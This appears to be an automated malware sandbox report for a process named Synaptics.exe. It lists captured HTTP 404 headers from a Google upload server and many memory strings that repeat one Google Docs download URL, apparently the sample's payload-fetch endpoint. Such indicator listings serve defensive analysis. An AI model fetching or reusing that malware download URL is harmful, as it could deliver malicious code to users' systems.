                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6XGEDuor3Rsh9ZrXcNbgz8MfekLoJTosk-7HBTA4vzKwT3JPsUaK5ouyhHXwTWp7Y2sOkQsQoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:13 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-xTW9A0qlftiWXYHqlji5Xw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7dskQjPM8EtBLj7DI219i3hc14ASKktY4H4FjGGOJ5TukjBE9GnF1JC8ZQzMt0b64_IChyvrgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:14 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-zMmt71LQvMD38aLi5pSu-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6UywZIBLsum1uqUkxN4QyXm2YELCF5fDptiFS8ZajQEybXSaKbR2D90dgXIHtEzbKAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:14 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZhvleVkG8FNxXc00zDN89g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7zaqHxWQ2xdr4v62YA1pchjlXaICEySCb7Qg71mzdE5paMr8e6tuntIeD3tqDqJni1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:17 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_pn05JeS1kQVyYlxCKXoow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4p0hWHWv7KI4Ft1cdauagpWlOTLJFun9qaAYvI5GDzkFo6e0YjBJgiC43nkc5FNQCf3b1A0JkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 09:58:17 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-XozYoz5MesEU26y0NyLlPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCRp
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadContt
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDPu
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadETv
                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFSs
                                Source: Synaptics.exe, 00000003.00000003.1328907159.000000000546F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                                Source: Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHj
                                Source: Synaptics.exe, 00000003.00000002.1704585165.000000000F1A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIMy
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadINx
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIO
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIPj
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIQ2
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIZ
                                Source: Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIm
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1678256875.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJOg
                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ_
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKSh
                                Source: Synaptics.exe, 00000003.00000003.1371121105.00000000054CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLQm
                                Source: Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM$
                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN1
                                Source: Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOA
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOMl
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOu
                                Source: Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                                Source: Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPIv
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPTA
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPerm
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1704585165.000000000F1A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQMB
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQu
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                                Source: Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadROW
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.00000000006F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSA
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSP
                                Source: Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSS
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSec-CU
                                Source: Synaptics.exe, 00000003.00000002.1677147245.0000000000688000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.000000000547E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000809F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                                Source: Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTNE
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTh
                                Source: Synaptics.exe, 00000003.00000002.1677147245.00000000006D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTv
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                                Source: Synaptics.exe, 00000003.00000003.1371121105.00000000054CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU(c
                                Source: Synaptics.exe, 00000003.00000002.1701019081.000000000EF82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUniv
                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1677147245.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1702581967.000000000F043000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1372365134.0000000000709000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000054C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007F48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVk&export=download
                                Source: Synaptics.exe, 00000003.00000002.1680158652.0000000005463000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000007F7D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.0000000008102000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1371121105.000000000546D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1680158652.00000000053ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1703794957.000000000F0E6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1685726810.000000000805A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                                Source: Synaptics.exe, 00000003.00000002.1685726810.0000000007FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW#
